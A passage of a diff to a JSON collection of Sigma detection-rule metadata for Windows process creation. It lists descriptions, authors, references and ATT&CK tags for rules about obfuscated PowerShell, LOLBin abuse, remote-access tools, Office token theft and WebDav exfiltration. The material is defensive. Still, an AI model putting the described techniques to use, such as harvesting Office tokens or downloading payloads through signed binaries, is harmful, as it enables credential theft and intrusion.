"7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION" - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_via_rundll.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_rundll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "056a7ee1-4853-4e67-86a0-3fd9ceed7555", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER" - }, - { - "description": "Detects Obfuscated Powershell via Stdin in 
Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "creation_date": "2020/10/12", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_invoke_obfuscation_via_stdin.yml", + "filename": "proc_creation_win_regedit_import_keys_ads.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_stdin.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1112", + "attack.defense_evasion" ] }, - "uuid": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "value": "Invoke-Obfuscation Via Stdin" + "uuid": "0b80ade5-6997-4b1d-99a1-71701778ea61", + "value": "Imports Registry Key From an ADS" }, { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "description": "Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio", "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", + "author": "Jason Lynch", + "creation_date": "2019/04/02", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_invoke_obfuscation_via_use_clip.yml", + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_clip.yml" + "sha256=23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57c", + "https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ] }, - "uuid": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", - "value": "Invoke-Obfuscation Via Use Clip" + "uuid": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "value": "MS Office Product Spawning Exe in User Dir" }, { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_via_use_mhsta.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_mhsta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "value": "Invoke-Obfuscation Via Use MSHTA" - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2019/10/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_via_use_rundll32.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "36c5146c-d127-4f85-8e21-01bf62355d5a", - "value": "Invoke-Obfuscation Via Use Rundll32" - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_via_var.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION" - }, - { - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "description": "Detects the creation of scheduled tasks in user session", "meta": { "author": "Florian Roth", - "creation_date": "2022/10/08", + "creation_date": "2019/01/16", "falsepositive": [ - "Legitimate use" + "Administrative activity", + "Software installation" ], - "filename": "proc_creation_win_iox.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/EddieIvan01/iox", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iox.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ] - }, - "uuid": "d7654f02-e04b-4934-9838-65c46f187ebc", - 
"value": "IOX Tunneling Tool" - }, - { - "description": "Detect the use of Jlaive to execute assemblies in a copied PowerShell", - "meta": { - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", - "creation_date": "2022/05/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_jlaive_batch_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", - "https://github.com/ch2sh/Jlaive", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ] - }, - "uuid": "0a99eb3e-1617-41bd-b095-13dc767f3def", - "value": "Jlaive Usage For Assembly Execution In-Memory" - }, - { - "description": "Detects the use of Ldifde.exe with specific command line arguments to potentially load an LDIF file containing HTTP-based arguments.\nLdifde.exe is present, by default, on domain controllers and only requires user-level authentication to execute.\n", - "meta": { - "author": "@gott_cyber", - "creation_date": "2022/09/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_ldifde_file_load.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1564968845726580736", - "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", - "value": 
"Suspicious Ldifde Command Usage" - }, - { - "description": "Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/06/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lethalhta.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://codewhitesec.blogspot.com/2018/07/lethalhta.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lethalhta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.005" - ] - }, - "uuid": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", - "value": "MSHTA Spwaned by SVCHOST" - }, - { - "description": "Local accounts, System Owner/User discovery using operating systems utilities", - "meta": { - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Legitimate administrator or user enumerates local users for legitimate reason" - ], - "filename": "proc_creation_win_local_system_owner_account_discovery.yml", + "filename": "proc_creation_win_susp_schtask_creation.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_local_system_owner_account_discovery.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml" ], "tags": [ - "attack.discovery", - "attack.t1033", - "attack.t1087.001" + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.005", + "attack.s0111", + "car.2013-08-001" ] }, - "uuid": "502b42de-4306-40b4-9596-6f590c81f073", - "value": "Local Accounts 
Discovery" + "uuid": "92626ddd-662c-49e3-ac59-f6535f12d189", + "value": "Scheduled Task Creation" }, { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", "meta": { - "author": "frack113", - "creation_date": "2022/02/11", + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/16", "falsepositive": [ - "Legitimate use" + "Legitimate administration activities" ], - "filename": "proc_creation_win_logmein.yml", + "filename": "proc_creation_win_software_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logmein.yml" + "https://github.com/harleyQu1nn/AggressorScripts", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518" + ] + }, + 
"uuid": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "value": "Detected Windows Software Discovery" + }, + { + "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/13", + "falsepositive": [ + "Legitimate uses of Mouse Lock software" + ], + "filename": "proc_creation_win_mouse_lock.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf", + "https://sourceforge.net/projects/mouselock/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mouse_lock.yml" + ], + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ] + }, + "uuid": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "value": "Mouse Lock Credential Gathering" + }, + { + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.echotrail.io/insights/search/wusa.exe/", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml" + ], + "tags": [ + "attack.execution" 
+ ] + }, + "uuid": "c74c0390-3e20-41fd-a69a-128f0275a5ea", + "value": "Wusa Extracting Cab Files From Suspicious Paths" + }, + { + "description": "Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session", + "meta": { + "author": "frack113", + "creation_date": "2022/02/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_redirect_to_stream.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_to_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "70e68156-6571-427b-a6e9-4476a173a9b6", + "value": "Cmd Stream Redirection" + }, + { + "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". 
This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/25", + "falsepositive": [ + "Legitimate command-lines containing the string mentioned in the command-line" + ], + "filename": "proc_creation_win_susp_office_token_search.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mrd0x.com/stealing-tokens-from-office-applications/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "6d3a3952-6530-44a3-8554-cf17c116c615", + "value": "Suspicious Office Token Search Via CLI" + }, + { + "description": "A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_webdav_client_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/17", + "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", + "value": "Suspicious WebDav Client Execution" + }, + { + "description": "Detects a suspicious call to the user32.dll 
function that locks the user workstation", + "meta": { + "author": "frack113", + "creation_date": "2022/06/04", + "falsepositive": [ + "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" + ], + "filename": "proc_creation_win_susp_rundll32_user32_dll.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_user32_dll.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", + "value": "Suspicious Workstation Locking via Rundll32" + }, + { + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "meta": { + "author": "Ján Trenčanský", + "creation_date": "2021/08/06", + "falsepositive": [ + "Legitimate deployment of AnyDesk" + ], + "filename": "proc_creation_win_anydesk_silent_install.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://support.anydesk.com/Automatic_Deployment", + "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_silent_install.yml" ], "tags": [ "attack.command_and_control", "attack.t1219" ] }, - "uuid": "d85873ef-a0f8-4c48-a53a-6b621f11729d", - "value": "Use of LogMeIn Remote Access Software" + "uuid": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "value": "AnyDesk Silent Installation" }, { - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or 
ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", "meta": { - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", - "creation_date": "2019/01/12", - "falsepositive": [ - "Exclude legitimate logon scripts" - ], - "filename": "proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1037/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml" - ], - "tags": [ - "attack.t1037.001", - "attack.persistence" - ] - }, - "uuid": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", - "value": "Logon Scripts (UserInitMprLogonScript)" - }, - { - "description": "This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.", - "meta": { - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)", - "creation_date": "2021/08/23", + "author": "Sreeman", + "creation_date": "2020/01/13", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbins_by_office_applications.yml", + "filename": "proc_creation_win_task_folder_evasion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", - 
"https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", - "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" + "https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26", + "https://twitter.com/subTee/status/1216465628946563073", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_task_folder_evasion.yml" ], "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", + "attack.defense_evasion", + "attack.persistence", "attack.execution", - "attack.defense_evasion" - ] - }, - "uuid": "23daeb52-e6eb-493c-8607-c4f0246cb7d8", - "value": "New Lolbin Process by Office Applications" - }, - { - "description": "This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed.", - "meta": { - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", - "creation_date": "2021/08/23", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbins_with_wmiprvse_parent_process.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml" - ], - "tags": [ - "attack.t1204.002", - "attack.t1047", - "attack.t1218.010", - "attack.execution", - "attack.defense_evasion" - ] - }, - "uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937", - "value": "Lolbins Process Creation with WmiPrvse" - }, - { - "description": "The \"AdPlus.exe\" 
binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/09", - "falsepositive": [ - "Legitimate usage of Adplus" - ], - "filename": "proc_creation_win_lolbin_adplus.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", - "https://twitter.com/nas_bench/status/1534916659676422152", - "https://twitter.com/nas_bench/status/1534915321856917506", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1003.001" - ] - }, - "uuid": "2f869d59-7f6a-4931-992c-cce556ff2d53", - "value": "Use of Adplus.exe" - }, - { - "description": "Execute C# code with the Build Provider and proper folder structure in place.", - "meta": { - "author": "frack113", - "creation_date": "2021/11/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_aspnet_compiler.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ] - }, - "uuid": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", - "value": "Suspicious aspnet_compiler.exe Execution" - }, - { - "description": "Performs execution of specified file, can be used for defensive evasion.", - "meta": { - "author": "frack113", - "creation_date": "2021/11/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_bash.yml", - "level": "medium", - "logsource.category": "process_creation", - 
"logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Bash/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "5edc2273-c26f-406c-83f3-f4d948e740dd", - "value": "Suspicious Subsystem for Linux Bash Execution" - }, - { - "description": "Detects when a user downloads file by using CertOC.exe", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/05/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_certoc_download.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "value": "Suspicious File Download via CertOC.exe" - }, - { - "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", - "meta": { - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", - "creation_date": "2020/10/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", - "value": "Custom Class Execution via Xwizard" - }, - { - "description": "Detects Execution 
via SyncInvoke in CL_Invocation.ps1 module", - "meta": { - "author": "oscd.community, Natalia Shornikova", - "creation_date": "2020/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", - "https://twitter.com/bohops/status/948061991012327424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "value": "Execution via CL_Invocation.ps1" - }, - { - "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", - "meta": { - "author": "frack113", - "creation_date": "2022/05/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_cl_loadassembly.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", - "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", - "value": "CL_LoadAssembly.ps1 Proxy Execution" - }, - { - "description": "Detects the use of a Microsoft signed script to execute commands", - "meta": { - "author": "oscd.community, Natalia Shornikova, frack113", - "creation_date": "2022/05/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml", - "level": "medium", - "logsource.category": 
"process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1216" - ] - }, - "uuid": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", - "value": "CL_Mutexverifiers.ps1 Proxy Execution" - }, - { - "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", - "meta": { - "author": "frack113", - "creation_date": "2021/11/03", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_cmdl32.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", - "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ] - }, - "uuid": "f37aba28-a9e6-4045-882c-d5004043b337", - "value": "Suspicious Cmdl32 Execution" - }, - { - "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", - "meta": { - "author": "frack113", - "creation_date": "2021/11/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567" - ] - }, - "uuid": "1f0f6176-6482-4027-b151-00071af39d7e", - "value": "Suspicious 
